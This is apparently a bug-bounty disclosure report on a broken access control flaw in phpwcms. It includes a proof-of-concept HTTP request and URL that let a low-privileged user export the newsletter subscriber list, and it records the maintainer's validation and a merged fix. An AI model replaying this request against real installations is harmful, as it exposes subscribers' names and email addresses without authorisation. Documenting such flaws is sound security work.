Forced Browsing in slackero/phpwcms

Valid

Reported on

Aug 31st 2021


✍️ Description

A malicious actor is able to reveal the list and details of newsletter subscribers.

🕵️‍♂️ Proof of Concept - Method 1;

This method requires a proxy utility, like BurpSuite.

  • With an administrator user, create some subscribers on the newsletters under Communication>>Newsletter Subscribers menu
  • Create a low privileged user, who has no access to manage the subscribers (In my case, I created a simple user without any administrative privileges)
  • With the low privileged user, log in, and obtain the PHPSESSID value from the cookie and the actual csrftoken value from a simple GET request from the URL.
  • Replace the PHPSESSID and the csrftoken value in the following GET request, with the values extracted in the last step.
GET /include/inc_act/act_export.php?csrftoken=[INSERT_CSRFTOKEN_HERE]&action=exportsubscriber HTTP/1.1
Host: localhost
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=[INSERT_PHPSESSID_HERE]; phpwcmsBELang=en
Connection: close

After sending this request, the response from the server contains the list of the subscribed users with their name, email, verification status and last modification status.

🕵️‍♂️ Proof of Concept - Method 2;

  • With an administrator user, create some subscribers on the newsletters under Communication>>Newsletter Subscribers menu
  • Create a low privileged user, who has no access to manage the subscribers (In my case, I created a simple user without any administrative privileges)
  • With the low privileged user, log in, and obtain the csrftoken value from a simple GET request from the URL.
  • With the low privileged user, simply browse the following URL, just replace the csrftoken value.
https://[SERVERADDRESS]/include/inc_act/act_export.php?csrftoken=[INSERT_CSRFTOKEN_HERE]&action=exportsubscriber

💥 Impact

A low privileged user is able to reveal the whole list of the users, who subscribed on the newsletters, and their details.

We have contacted a member of the slackero/phpwcms team and are waiting to hear back 3 months ago
Oliver Georgi validated this vulnerability 3 months ago
TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
Oliver Georgi confirmed that a fix has been merged on 4babfa 3 months ago
Oliver Georgi has been awarded the fix bounty